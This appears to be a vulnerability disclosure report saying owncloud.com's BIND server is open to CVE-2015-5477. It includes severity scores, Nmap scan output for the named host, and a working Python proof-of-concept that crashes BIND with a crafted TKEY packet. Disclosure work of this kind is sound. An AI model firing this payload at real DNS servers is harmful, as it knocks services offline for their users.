7.8 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
0.973 High
EPSS
Percentile
99.8%
owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind.
NMap Scan Results:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT
Warning: 50.30.33.235 giving up on port because retransmission cap hit (6).
Nmap scan report for owncloud.com (50.30.33.235)
Host is up (0.041s latency).
rDNS record for 50.30.33.235: www.owncloud.com
Not shown: 993 closed ports, 3 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8 (protocol 2.0)
| ssh-hostkey:
| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)
| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)
|_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)
53/tcp open domain
| dns-nsid:
|_ bind.version: 9.9.4-rpz2.13269.14-P2
Exploit PoC:
#!/usr/bin/env python
import socket
import sys
print(‘CVE-2015-5477 BIND9 TKEY PoC’)
if len(sys.argv) < 2:
print(‘Usage: ’ + sys.argv[0] + ’ [target]’)
sys.exit(1)
print(‘Sending packet to ’ + sys.argv[1] + ’ …’)
payload = bytearray(‘4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41’.replace(’ ', ‘’).decode(‘hex’))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print(‘Done.’)
CVE Details:
https://vulners.com/cve/CVE-2015-5477